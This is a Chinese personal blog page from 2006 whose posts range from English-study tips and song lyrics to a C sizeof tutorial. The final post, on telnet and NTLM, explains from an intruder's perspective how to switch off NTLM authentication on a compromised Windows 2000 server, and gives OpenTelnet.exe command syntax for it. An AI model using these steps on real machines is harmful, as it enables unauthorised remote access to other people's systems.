关于作者

用户名:菲菲FLY
笔名:灰
地区: -
行业:本科

日历  

快速登录

+ 用户名:
+ 密 码:

在线留言



黑客——网络安全

动漫

软件下载

音乐

电脑知识

GOOGLE

Google

搜索WWW soln

网页设计

访问统计:
文章个数:17
评论个数:1
留言条数:22




Powered by BlogDriver 2.1

灰菲湮灭

 

我看到一个奇怪的现象,就是看我的BLONG后留言的一部分人,都在不久后做成了如下事情:1、恋爱成功了;2、生意谈成了;3、升官发财了;4、心情舒畅了; 5、家庭和睦了;6、身体健康了;7、万事顺意了。这部分人就是先顶再看,看了还顶的兄弟姐妹们。毛主席教导我们:“看到好站一定要留言!”毛主席的话,是很有道理的。留个言就那么难吗???

文章

组成原理考试

801,891都已经成为过去式了。本来以为会理所当然地进行821,没想到组成原理要考试~

到现在为止,看了一个星期左右的组成原理了,却没有看出来什么,突然感到害怕,好像除了网络,别的东西再看不下了。

挺郁闷,一个星期了,什么也没搞成,如果按原计划,至少可以远程接入的书给看完吧,唉~

明天要考试了。

- 作者: 2006年11月15日, 星期三 22:53  回复(0) |  引用(0) 加入博采

把英语踩在脚下的10条黄金准则

 
http://www.51ielts.com 2006-8-28 来源: 【无忧雅思网】 

--------------------------------------------------------------------------------
 
学习任何语言都是需要花费很多努力,但绝不要放弃。从绝望中寻找希望,人生终将辉煌!

1.What is language for? Some people seem to think it is for practicing grammar rules and learning lists of words--the longer the words the better. That’s wrong. Language is for the exchange of ideas, for communication.

语言到底是用来干什么的呢?一些人认为它是用来操练语法规则和学习一大堆单词——而且单词越长越好。这个想法是错误的。语言是用来交换思想,进行交流沟通的!

2. The way to learn a language is to practice speaking it as often as possible.

学习一门语言的方法就是要尽量多地练习说。

3. A great man once said it is necessary to dill as much as possible, and the more you apply it in real situations, the more natural it will become.

一位伟人曾说,反复操练是非常必要的,你越多的将所学到的东西运用到实际生活中,他们就变的越自然。

4.Listening and imitating should always go together. Use the LIP method! Listen-Imitate-Practice!

听和模仿一定要同时做,使用“LIP”方法:听、模仿、操练!

5. Use all your senses to learn English. You must hear English, read English, touch English, smell English, and taste English. Feel English with your heart. Immerse yourself in this language. Begin to think in English.

运用一切感官学习英语。你必须听英语、说英语、触摸英语、闻英语,还要尝尝英语的味道。用心去感受英语。让自己沉浸在这门语言当中。学会用英语思考。

6. Relax! Be patient and enjoy yourself. Learning foreign languages is just a piece of cake.

放轻松!要有耐心,并且享受英语带来的乐趣!学习外语只不过是小菜一碟。

7. Rome wasn’t built in a day. Work harder and practice more. Your hardworking will be rewarded by God one day.

God is equal to everyone!

冰冻三尺,非一日之寒。更加努力的学习,更加勤奋的操练,你所付出的一切将会得到上帝的报答,上帝是公平的。

8. Use a dictionary and grammar guide constantly. Keep a small English dictionary with you at all time.

When you see a new word, look it up. Think about the word--use it. in your mind, in a sentence.

经常使用字典和语法指南。随身携带一本小英文字典,当你看到一个新字时就去查阅它,思考这个字——然后学着去用它,在你的心中,在一个句子里。

9. Try to think in English whenever possible. When you see something, think of the English word of it;

then think about the word in a sentence.

一有机会就努力去用英文来思考。看到某事时,想想它的英文单词;然后把它用到一个句子中去。

10. Practice tenses as much as possible. When you learn a new verb, learn its various forms.

A thousand words will not leave so an deep impression as one deed.

尽可能多的操练时态。学习一个动词的时候,要学习它的各种形态。千言万语不如一个行动

怎么样,是否感悟颇深。

- 作者: 2006年08月30日, 星期三 20:18  回复(0) |  引用(0) 加入博采

大学毕业 谁是理想雇主

 
http://www.51ielts.com 2006-8-25 来源: 中国网 

--------------------------------------------------------------------------------
 
大学新生入学在即,但是中国仍有不少毕业生没有找到合适的工作,在酷夏中为未来生计继续奔忙。在全世界,数以千万计的大学毕业生也同样在为工作奔波。发达国家的大学生们热衷于何种工作,他们对找工作是否有独特心得和可资借鉴之处?
  美国:政府部门很吃香

  娱乐业巨头迪斯尼、搜索引擎巨头谷歌,它们和美国国务院、联邦调查局以及中央情报局之间会有什么样的联系呢?风马牛不相及?

  事实并非如此,最新调查显示,迪斯尼、谷歌、美国国务院、联邦调查局和中央情报局位列美国大学生理想雇主的前五位。

  Universum公司2006年针对美国207所著名大学的37000名即将毕业的大学生进行了理想雇主调查。调查将学生分成五类:商科、IT、工程、自然科学和文科。总体排名的前五位中有三席被政府机构占据:国务院、联邦调查局、中央情报局。其中文科学生最希望到政府部门工作。而去年,国务院还只排在第36位。除此之外,国家安全局排名第26位,虽然落后IBM、星巴克和耐克,但领先于亚逊、美国银行和时代华纳等多家著名公司。

  以往美国大学生一般热衷于进大公司或者自己创业。因为大部分美国学生都背负着助学贷款,薪水不够优厚的行业对他们来说是种十分奢侈的选择。但今年为什么出现了这样的变化?5年前在榜单前100位基本见不到政府机构,而今年居然有三个挤进了前五位?

  2006年的毕业生属于千年一代(1979年以后出生,毕业年份始于21世纪的人),他们已经取代了以往的X一代。X一代的主要特点是自立和务实,千年一代则理想主义色彩更浓。他们的最高职业目标要求平衡个人和职业生活、更高的教育、建立健全的经济基础、回报社会。前辈X一代通常将经济因素视为择业的优先考虑。但是千年一代认为高道德水准才是最重要的,调查中只有26%的人提及经济因素。

  2006年的毕业生是911事件后开始大学生活的第一批大学毕业生。911悲剧唤醒了年轻人澎湃的爱国热情。同时,《白宫风云》、《24小时》等热播电视剧给千年一代或真实或虚拟地展现了政府机构的内部工作方式。这些都影响到了大学生的就业观。

  美国高等学校总数约为4000所,在校生人数近1500万。美国没有专门的大学生就业市场,大学毕业生需要和有工作经验的求职者平等竞争。美国从中学开始就对学生进行职业生涯引导。政府规定,每所中学都要配备教辅人员,负责定期组织专题讲座和咨询指导,引导中学生了解相关专业在社会的实际发展情况,结合自身兴趣,及早考虑职业发展方向。

  尽管如此,美国大学生同样也会面临失业问题。但他们心态普遍比较平和。美国大学生比较独立,一般在读书期间都会兼职。毕业如果找不到合适的工作,他们会找些零工,争取先养活自己;选择就业前景看好的专业继续上学,也是一部人的选择。美国文化价值观强调个人能力,能否就业、就业好坏,完全是个人能力的体现。因此,美国大学生面对失业问题整体心态较平稳,压力往往分散在个体身上,不会形成整体社会压力。(国际先驱导报驻纽约记者 但凡)

  日本:大公司是首选

  毕业时选择一个适合自己发展的制高点,是事业的良好开端。因此对每个大学生来说,就业都是人生关键的一环。正因为如此,日本大学毕业生生就业总是选择非常慎重。


  日本大学生求职时间都比较早,他们往往在大学一二年级时尽量多拿学分,然后从三年级开始就到公司去实习。他们频繁更换实习地点,期望能够找到合适自己的职位。有资料显示,为了找工作,日本平均每名大学生要经过16家公司的笔试。

  近几年的调查结果表明,大公司总是大学生的首选,排在前50位的就职热门基本上都是大公司,因为大公司相对经济效益好、生活有保障。日本大学生喜欢大公司,但并不是盲目追求大公司,调查结果表明,只要感觉工作有意义,40%以上的人认为中小企业也可以,有2.9%的人一开始就想在中小企业工作,因为公司人少,自己很快可以独当一面,还有1.5%的大学生想开办自己的公司。

  找到工作的日本大学生,一般都会脚踏实地,从最底层干起,尽心尽力做好自己的本职工作,凭自己的实力一步一个脚印,而不是好高骛远,想马上发大财。当然如果公司氛围不好、工作没有意思、工作地点不固定、加班多,日本大学生也会辞职,据统计,因感觉工作不理想在三年内辞职的大学生高达30%。

  据统计,2006年日本春季毕业生中,毕业前找到工作者占77.4%,剩下找不到工作的学生,只能一边打工一边找工作。在日本打零工每月也能挣二三十万日元,生活不成问题,只是没有什么前途。当然也有部分大学生干脆就不想工作,毕业后继续当“啃老族”,像这样的人在日本已有40多万。

  法国:记者最热门

  法国民意测验所(Ifop)今年曾为《大学生》杂志进行的一项调查显示,60%的法国大学生声称有信心将来找到一份合乎愿望的职业或者实习机会,72%的受访者相信将来的生活会好于父母一代。不过,也有69%的人对法国的社会环境持悲观态度。这也难怪,法国26岁以下的年轻人当中有22.8%的人在全国就业办事处登记造册,希望因此能获得一个工作机会,这个比例在欧洲国家当中是最高的。

  失业率居高不下并不影响大学生怀有自己的梦想。法国全国教育及职业情报局(Onisep)对1000名大学生进行了调查,主题为“什么是你毕业后的理想职业”。答案五花八门,但有一些职业被提及得最多。其中接受采访的女生的十大理想职业分别为:教师,记者,演员,律师,医生,教育家,保育员,理发师,秘书,歌星;男生的十大理想职业分别为:工程师,飞机驾驶员,商人,信息工程师,教师,演员,足球运动员,机械师,消防员,记者。

  不论是社会调查还是在网上论坛,法国青少年只要谈到“理想职业”,就一定少不了“记者”这一项。随着电子传媒逐渐普及,电视新闻播报员、体育节目评论员或者重大事件的新闻主持人所散发出来的强大“魅力”让法国青年为之倾倒。

  同样,许多年轻人希望自己成为电视新星或者某个真人秀节目的主角,这都是因为受到电视节目的影响。《大学生》杂志主编奥利维耶·罗洛说,美国连续剧《急诊室的故事》在法国播出后,他平均每天都要接待三四名希望成为急诊室医生的学生。后来电视台又播出了一个新的连续剧,这些年轻人的职业梦想马上跟着改变。罗洛提醒说,在规划未来人生目标时,青少年一定要保持清醒头脑,不能让理想与现实过分脱节。

  另一方面,越来越多的法国大学生投身到无政府组织、人道组织、公平贸易和可持续发展等领域,这是因为他们希望“做一些有用并且接近自己价值观的事情”。

  法国全国教育及职业情报局局长埃尔韦·德蒙·德萨瓦斯认为,应当帮助大学毕业生将理想转化为志向与愿望,其途径就是将大众信息转变成个人指导。针对这种情况,法国设置了500个信息与指导中心,由专门顾问免费为青少年提供就业指导。(国际先驱导报驻巴黎记者 林晓轩)
 

- 作者: 2006年08月30日, 星期三 20:17  回复(0) |  引用(0) 加入博采

发点牢骚~

唉~~~郁闷呢,昨天值班偷溜啦,结果运气超烂的被逮到,据八国说老师好像有点生气,唉,运气真差,死八国,骗我说晚上不用在这儿呆着.唉,早就说要把本科生换掉,用研究生,只是一直不知道确不确切,不知道还能在这儿呆多久,离开这儿后能去哪儿,呵呵,最大的可能估计是加宿舍堕落去...唉...英语啊..四级快出来了吧,不知道能考几大分.估计这次是过不去,唉~~~

27号晚上至的学校,至今天为止除了买了些东西,都不知道自己在干些什么,真郁闷,以这个状态,不知道十一之前还能不能考过去CCNA,到目前为止,竟然连教材的一遍都没有看完,还有那么多的题目,一道也没有看,暑假两个月真不知道自己干嘛了.

- 作者: 2006年08月30日, 星期三 15:43  回复(0) |  引用(0) 加入博采

香水有毒

香水有毒

胡杨林

我曾经爱过这样一个男人
他说我是世上最美的女人
我为他保留着那一份天真
关上爱别人的门

也是这个被我深爱的男人
把我变成世上最笨的女人
他说的每句话我都会当真
他说最爱我的唇

我的要求并不高
待我像从前一样好
可是有一天你说了同样的话
把别人拥入怀抱

你身上有她的香水味
是我鼻子犯的罪
不该嗅到她的美
檫掉一切陪你睡

你身上有她的香水味
是你赐给的自卑
你要的爱太完美
我永远都学不会

- 作者: 2006年08月23日, 星期三 09:35  回复(0) |  引用(0) 加入博采

走了你还有谁
话说到最后 
我的呐喊只有沉默 
你冷冷的眼神 
像刺骨的寒流 
穿过我的心留下一个伤口 
你转身就走 
不愿再做任何停留 
你坚决的脚步 
踏过我的胸口 
我竟忘了泪该怎么流 
我该相信谁 
依靠谁,去问谁 
我该追逐谁 
等待谁,去爱谁 
你要我选择 
我的选择没有你还能有谁 
我该相信谁 
依靠谁,去问谁 
我该在乎谁 
珍惜谁,去为谁 
你要我决定 
我的决定已被你统统撕碎 

- 作者: 2006年08月21日, 星期一 10:54  回复(0) |  引用(0) 加入博采

杰伦专辑《依然范特西》8月23日 主打歌首播...同步预购

专辑名称:依然范特西
演唱歌手:周杰伦
唱片公司:阿尔发唱片
发行时间:2006年09月08日
专辑语种:国语专辑CD+DVD

亚洲天王-周杰伦, 2006年全新大碟 依然范特西 (Still Fantasy) 将于9月8日全球发行.

特别预购版加送巨型Jay Chou超靓海报
一张海报包含4个不同造型. 更以特制精美胶筒包装, 极具收藏价值

周杰伦新专辑【依然范特西】8月23日起全亚洲同步预购...同日首播主打歌....


专辑已知曲目介绍:

1.我的 曲:周杰伦 词:方文山
动感地带广告曲,JAY首次玩转电子音乐,歌曲霸气十足
2.帽子戏法(百事可乐广告歌) 曲:周杰伦 词:方文山
JAY尝试全新曲风,大玩嘻哈风格,MV更是特地跑到百老汇耗资150万拍摄
3.邂逅 曲:周杰伦 词:周杰伦
JAY一手包办词.曲.编曲,又一首深情伤感的杰式情歌
4.渐黄昏(满城尽带黄金甲主题曲) 曲:周杰伦 词:黄俊郎

延续JAY一贯的中国曲风,配以黄俊郎气势磅礴的词藻,让沙场
;血战的画面立即浮现在人眼前
5.雨夜(满城尽带黄金甲片尾曲) 曲:周杰伦 词:宋建彰(弹头)
既[ 搁浅].[枫]之后,JAY再次邀好友宋健彰填词,共同谱写出感人至深的情歌

6.千里之外

中国风的一曲歌~~

7.绘梦之卷

*************************************************************************
8月23日主打歌首播视听地址 (估计是《邂逅》或者《渐黄昏》。。。)

全国地区:全国音乐协作联盟
12点,中歌榜
收听地址:
http://listen.bjradio.com.cn/yinyue_player.htm
 


北京地区:FM974
20点,中歌榜
收听地址:
http://listen.bjradio.com.cn/yinyue_player.htm
 
21点,全球榜
收听地址:
http://listen.bjradio.com.cn/yinyue_player.htm
 

上海地区:动感101
10点
收听地址:
mms://vl.sina.com.cn/popmusic/
 


TW地区:HitFm
20点-22点,HITO大首播
收听地址:
http://radio.hinet.net/radio/player/player.jsp?radio_id=87
 
http://radio.hinet.net/radio/player/player.jsp?radio_id=88
 
http://radio.hinet.net/radio/player/player.jsp?radio_id=90
 
*********************************************************************************
8月23日。。专辑全亚洲同步预购。。。(大陆预购赠送海报[暂定])
*********************************************************************************

- 作者: 2006年08月21日, 星期一 10:48  回复(0) |  引(0) 加入博采

Google在美份额首度下降 创始人股票只抛不买
摘要:美国网络流量统计公司comScore18日公布了美国三大搜索引擎的最新查询份额。Google在美国市场的搜索份额首次出现了环比下降。市场份额较6月下滑1个百分点。 查看全文

- 作者: 2006年08月21日, 星期一 10:26  回复(0) |  引用(0) 加入博采

教你如何一月背9000个单词

                                              文章来源:河南教育信息港 

    一月背9000个单词并不是不可能的,但每天要被9个小时。而且要背字典。我背的是《现代英汉字典》。有40000多个单词。60000个列句。就拿它来当例子,告诉你如何安排: 

  一个月有4个星期,一星期用6天被,每天9个小时,六天为3张字典的结束,也就是六天后就不用被字典的第一张了。12天后就不用背字典的前两张了。。。。。一天背3张,大约每张100个单词。每张用2小时。复习是比较复杂的,(1ST-DAY复习用30分(3张),2ND-DAY用1小时(6张),3RD-DAY用1。30小时(9张),4TH-DAY用2小时(12张),5TH-DAY用2.30小时(15张),6TH-DAY用3小时(18张)。)以后复习时间就一直是3小时拉。你最好自己算一算。心里有个数就行了。 

  (熟悉单词)  被单词时不要写。别管它是怎么写的,写的事以后再说。先保证会读,并知道它的具体意思。大约连续学2。30小时后你就会心不在焉拉,我就是这样的。所以2。30小时后要休息至少15分钟。然后就这样循环。直到背完3张。在复习一下。一天的任务就完成了。 

  (对第一天的单词有比较深刻的印象)  还别管它怎么写的,今天不但要被3张,而且还要复习上次的3张。和上次一样被,但每张要复习10分钟左右。 

      (更深的印象)  别管怎么写,还是3张,但要复习6张。 

      (印象还挺深的)  这次要写拉,(我是说复习时要写,但别都写,那张以复习过3遍后在写)假如你以前注意单词的拼法的话,那就好办拉。别写太多。一个单词写4-5便就行拉。别太在意了。 

      (深!)  还是写。4-5便(复习时写)还是上边的做法。 

      (一样)  这次要认真点拉!今天意味着你要完成第一次背的3张拉。所以要保证完全熟悉那3张的单词。作到听到就知道它有什么意思。想到就会写。把不会的化住,或计到什么地方。每天看看就行拉。从今天起每天都要这样。假如你不明白的话就自己好好想想吧。 

[怎么背长单词]  那emancipation来说把。把它分解一下:  e  man  ci  pa  tion  读读看。是不是很容易?还有congratulation  :  con  gra  tu  lation.  明白了吧。千万别一个字母一个字母地背。 

[大型考试介绍]  6及考试要求你熟练掌握约6000单词。大学本科毕业就是着水平。  TOFEL要求12000-15000单词  GRE要20000单词以上。要在TOFEL的基础上熟背6000单词在2-3个月里  GRE后还有好几个考试,就不介绍了。我也不太清楚。 

[听力]  听是比较难的。去买新东方的听力磁带,大约20多盘(可能!),每天听5小时以上。这不是于英语初学者。

- 作者: 2006年08月21日, 星期一 09:53  回复(0) |  引用(0) 加入博采

雅思与托福的区别

 
文章来源:不详 点击数: 更新时间:2006-7-9 

凡是参加过雅思考试的考生,都会对感觉到它与我们熟悉的其他外语考试有很大的不同。
首先,我们知道,大学英语四、六级考试是以美国教育机构ETS命题的TOEFL(托福)为蓝本,里面加入一些中国英语教学所强调的语法知识,其考试思想与托福如出一辙,都强调考试的客观性与效度,因此它们的命题都从巨大规模的题库中随机抽出,并且以四选一或五选一的选择题为主要题型。而雅思由英国剑桥大学考试委员会命题,其反映了英国语言测试和语言学习的一些基本思路,即强调语言的交流功能和实用性,考试的题型也多种多样,经常是在测试听力时也考察考生的单词拼写,考阅读时也涉及写作。而设立一对一的口试则更加强调语言能力在实际交际中的应用。当然突出这种思想从一定程度上是以牺牲考试的客观性为代价的。考过雅思的考生可能都有这样的感觉,雅思的考题有时不是很严密,而且因为以人(口语考官)为测量工具,其不可避免地会有一些主观因素的介入。

其次,由于托福是美国人出题,它当然要以美式英语作基准,因此在托福听力中完全是标准的美音,而且美式的习语、俚语也时有出现,而在托福阅读中,又有大量的关于美国的历史、文化、政治、地理等方面的文章。因此我们可以说托福是美式英语的考试。而雅思考试在设立之初就以international(国际化)为出发点,由于考试当局是英澳两国为主,因此经常涉及的文化地理知识以这两国居多,而北美乃至其他英语国家也时有提及。但发音上,雅思力图做到国际化,也就是说各国口音都会有所表现,当然这其中也是以英澳发音为主。

当然雅思与托福和四、六级也有一些相同点。由于都是针对母语非英语而又要去英语国家的人士所设计,因此象英语国家的历史、文化、政治、地理等方面的知识,以及留学生活中经常会涉及的场景和文件,都是出题的重点。从这个角度上来说,了解些英语国家的文化背景知识会对大家准备考试大有帮助。

- 作者: 2006年08月21日, 星期一 09:47  回复(0) |  引用(0) 加入博采

全球动画前100名

全球动画前100名 
 
 
1、海贼王

2、火影忍者

3、钢之炼金术师

4、棋魂(棋灵王) 
 
 
5、灌篮高手(男儿当入樽)

6、网球王子

7、高达seed

8、死神

9、龙珠

10、全职猎人

11、通灵王

12、游戏王

13、新世纪福音战士

14、足球小将

15、浪客剑心 
 
 
16、头文字d

17、北斗神拳

18、犬夜*

19、鬼眼狂刀

20、h2

21、金金属狂潮

22、最游记

23、圣斗士星矢

24、幽游白书

25、魔剑美神 
 
26、不思议游戏(魔幻游戏)

27、城市猎人

28、剑风传奇

29、烈火之炎

30、宠物小精灵

31、数码暴龙

32、蜡笔小新

33、四驱兄弟

34、超速摇摇

35、爆旋驼骡

36、激斗战车

37、棒球英豪

38、多拉a梦

39、天使怪盗

40、魔神英雄传

41、变形金刚 
 
42、樱花大战

43、街头霸王

44、千与千寻

45、闪灵2人组

46、翼神传说

47、名侦探柯南

48、金田一少年事件薄

49、彼男彼女的故事

50、天地无用

51、神雕侠侣动画版

52、百变小樱

53、超时空要塞

54、罗德斯岛战记

55、青涩宝贝

56、美鸟曰记

57、巫士猎人罗宾

58、舞hime

59、快乐课程

60、妄想代理人 
 
 
61、花田少年史

62、地狱老师

63、宇宙牛仔

64、圣石小子

65、最终兵器彼女

66、今天开始魔王

67、蓝猫淘气3000问 (注意这是中国滴!!!!!!!)

68、圣枪修女

69、铃音

70、纯情房东俏房客

71、美少女战士  
 

72、神风怪盗

73、小魔女do re mi

74、天使·爱·美沙

75、婚纱小天使

76、魔力女管家

77、丁丁历险记

78、dna

79、洛克人

80、12国记

81、天上天下

82、忍者乱太郎

83、七武士

84、麦兜 
 
 
85、东京地下城

86、银河天使

87、青之6号

88、没头脑和不高兴 (这个也是中国滴)

89、流星花园

90、龙

91、螺旋前世缘

92、蓝青

93、来自魔神

94、中华小当家

95、蒙面猫侠

96、天使之尾

97、未世战士

98、毁灭者战记

99、火魅子

100、火王

- 作者: 2006年08月19日, 星期六 13:23  回复(0) |  引用(0) 加入博采

思念的时候,就下棋吧
摘要:也许当走到那个世界的顶峰的时候,那个身影又会突然出现在身后,微微笑着说一句:“小光,来下棋啊。” 查看全文

- 作者: 2006年08月15日, 星期二 13:59  回复(0) |  引用(0) 加入博采

海贼王是否经典,你说了算~
摘要:一群人,一个目标,一个誓言,一个关于海贼的童话. 查看全文

- 作者: 2006年08月9日, 星期三 22:01  回复(1) |  引用(0) 加入博采

解析C语言中的sizeof

 解析C语言中的sizeof

2003-4-18 12:43:20   CCIDNET   方敏、吴鸣鸣   阅读次数: 26185

一、sizeof的概念 
  sizeof是C语言的一种单目操作符,如C语言的其他操作符++、--等。它并不是函数。sizeof操作符以字节形式给出了其操作数的存储大小。操作数可以是一个表达式或括在括号内的类型名。操作数的存储大小由操作数的类型决定。 

二、sizeof的使用方法 
  1、用于数据类型 

  sizeof使用形式:sizeof(type) 

  数据类型必须用括号括住。如sizeof(int)。 

  2、用于变量 

  sizeof使用形式:sizeof(var_name)或sizeof var_name 

  变量名可以不用括号括住。如sizeof (var_name),sizeof var_name等都是正确形式。带括号的用法更普遍,大多数程序员采用这种形式。 

  注意:sizeof操作符不能用于函数类型,不完全类型或位字段。不完全类型指具有未知存储大小的数据类型,如未知存储大小的数组类型、未知内容的结构或联合类型、void类型等。 

  如sizeof(max)若此时变量max定义为int max(),sizeof(char_v) 若此时char_v定义为char char_v [MAX]且MAX未知,sizeof(void)都不是正确形式。 

三、sizeof的结果 
  sizeof操作符的结果类型是size_t,它在头文件中typedef为unsigned int类型。该类型保证能容纳实现所建立的最大对象的字节大小。 

  1、若操作数具有类型char、unsigned char或signed char,其结果等于1。 

  ANSI C正式规定字符类型为1字节。 

  2、int、unsigned int 、short int、unsigned short 、long int 、unsigned long 、float、double、long double类型的sizeof 在ANSI C中没有具体规定,大小依赖于实现,一般可能分别为2、2、2、2、4、4、4、8、10。 

  3、当操作数是指针时,sizeof依赖于编译器。例如Microsoft C/C++7.0中,near类指针字节数为2,far、huge类指针字节数为4。一般Unix的指针字节数为4。 

  4、当操作数具有数组类型时,其结果是数组的总字节数。 

  5、联合类型操作数的sizeof是其最大字节成员的字节数。结构类型操作数的sizeof是这种类型对象的总字节数,包括任何垫补在内。 

  让我们看如下结构: 

  struct {char b; double x;} a; 

  在某些机器上sizeof(a)=12,而一般sizeof(char)+ sizeof(double)=9。 

  这是因为编译器在考虑对齐问题时,在结构中插入空位以控制各成员对象的地址对齐。如double类型的结构成员x要放在被4整除的地址。 

  6、如果操作数是函数中的数组形参或函数类型的形参,sizeof给出其指针的大小。 

四、sizeof与其他操作符的关系 
  sizeof的优先级为2级,比/、%等3级运算符优先级高。它可以与其他操作符一起组成表达式。如i*sizeof(int);其中i为int类型变量。 

五、sizeof的主要用途 
  1、sizeof操作符的一个主要用途是与存储分配和I/O系统那样的例程进行通信。例如: 

  void *malloc(size_t size), 

  size_t fread(void * ptr,size_t size,size_t nmemb,FILE * stream)。 

  2、sizeof的另一个的主要用途是计算数组中元素的个数。例如: 

  void * memset(void * s,int c,sizeof(s))。 

六、建议 
  由于操作数的字节数在实现时可能出现变化,建议在涉及到操作数字节大小时用ziseof来代替常量计算。

- 作者: hikaru 2005年07月18日, 星期一 13:21  回复(0) |  引用(0) 加入博采

有关telnet的一些知识
telnet


前几天我说到过telnet,好象很多朋友不太明白,也不会用,我想这主要是因为你的命令掌握不太牢固啊,我今天就把telnet详细讲一遍,再说一些简单的网络相关命令

先说telnet,什么是telnet?Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),那么什么是远程登录?
我想这个大家都明白一点,定义:远程登陆是指用户使用Telnet命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。
使用Telnet协议进行远程登陆时需要满足以下条件:在本的计算机上必须装有包含Telnet协议的客户程序;必须知道远程主机的Ip地址或域名;必须知道登录标识与口令。

Telnet远程登录服务分为以下4个过程:

1)本地与远程主机建立连接。该过程实际上是建立一个TCP连接,用户必须知道远程主机的Ip地址或域名;

2)将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT(Net Virtual Terminal)格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报;

3)将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端,包括输入命令回显和命令执行结果;

4)最后,本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。
再说一下什么叫Telnet协议?简单点说Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务:

1)Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统,他们只需构造使用标准接口的程序;

2)Telnet包括一个允许客户机和服务器协商选项的机制,而且它还提供组标准选项;

3)Telnet对称处理连接的两端,即Telnet不强迫客户机从键盘输入,也不强迫客户机在屏幕上显示输出。
关于这个就说这么多了,至于其他的一些就不说了,因为没什么帮助对我门,如果你有兴趣,可以去本站查查相关资料
再说说Win2000的Telnet服务,因为大部分服务器用的都是2000的
Win2000为我们提供了Telnet客户机和服务器程序:Telnet.exe是客户机程序(Client),tlntsvr.exe是服务器程序(server),同时它还为我们提供了Telnet服务器管理程序tlntadmn.exe。  其实从应用层面上,Win2000的Telnet服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已.Windows 2000 默认安装了 Telnet 服务,但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置:

AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。

DefaultDomain:可以对与该计算机具有信任关系的任何域设置。默认值是"."。

DefaultShell:显示 shell 安装的路径位置。默认值是: %systemroot%\System32\Cmd.exe /q /k

MaxFailedLogins:在连接终止之前显示尝试登录失败的最大次数。默认是3。

LoginScript:显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%\System32\login.cmd”,你可以更改脚本内容,这样登录进Telnet的欢迎屏幕就不一样了。

NTLM:NTLM身份验证选项。默认是2。可以有下面这些值:
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证,如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。

TelnetPort:显示 telnet 服务器侦听 telnet 请求的端口。默认是:23。你也可以更改为其他端口。

以上各项设置你可以使用tlntadmn.exe(Telnet服务器管理程序)来进行非常方便的配置,配置后需要重新启动Telnet服务。如图1


2 NTLM


提到了telnet就不能不提NTLM,我想这也是让入侵者最为头痛的一件事,哪怕你获得了管理员帐号和密码,想简单通过NTLM也并非易事,况且win2000中的telnet默认仅以NTLM方式验证身份,这就让我们不得不关注NTLM这个东东,那么什么是NTLM呢?

早期的SMB协议在网络上明文传输口令,后来出现了"LAN Manager Challenge/Response"验证机制,简称LM,它十分简单以至很容易被破解,微软随后提出了WindowsNT挑战/响应验证机制,即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的:

1、客户端首先在本地加密当前用户的密码成为密码散列
2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输
3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge(挑战)
4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response(响应)
5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器
6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。
7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功。

从上面的过程我们可以看出,NTLM是以当前用户的身份向Telnet服务器发送登录请求的,而不是用你扫到的对方管理员的帐户和密码登录,显然,你的登录将会失败。举个例子来说,你家的机器名为A(本地机器),你入侵的机器名为B(远地机器),你在A上的帐户是xinxin,密码是1234,你扫到B的管理员帐号是Administrator,密码是5678,当你想Telnet到B时,NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作,即用xinxin和1234,而并非用你扫到的Administrator和5678,且这些都是自动完成的,根本不给你插手的机会,因此你的登录操作将失败。

由于Telnet服务器对NTLM的使用有3个选项,所以当你Telnet远地机器时,会显示下面情况中的一种:

1)身份验证选项=0时
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:

\\为0时不使用NTML身份验证,直接输入用户名和密码,比如你可以输入扫到的Administrator和5678


2)身份验证选项=1时
=====================================
NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:

\\先尝试 NTLM 身份验证,如果失败,再使用用户名和密码,其实这种方式对于我们来说,与上一种方式没什么区别


3)身份验证选项=2时
=====================================
NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遗失对主机的连接。
C:\>

\\仔细看看上面的显示,根本没有给你输入用户名和密码的机会,直接断开连接,扫到了密码也是白扫
所以对于入侵者来说,NTLM是横在我们面前的一座大山,必须要除掉它,一般我们有如下几种方法:

1通过修改远程注册表更改telnet服务器配置,将验证方式从2改为1或0;
2使用NTLM.exe,上传后直接运行,可将telnet服务器验证方式从2改为1;
3在本地建立扫描到的用户,以此用户身份开启telnet客户机并进行远程登录;
4使用软件,比如opentelnet.exe(需要管理员权限且开启IPC管道)
5使用脚本,如RTCS,(需要管理员权限但不依赖IPC管道)

基本上是以上的5种,其中后两种是我们比较常用的开telnet的手法,而且使用方法十分简单,命令如下:

OpenTelnet.exe \\server username password NTLMAuthor telnetport
OpenTelnet.exe \\服务器地址 管理员用户名 密码 验证方式(填0或1) telnet端口

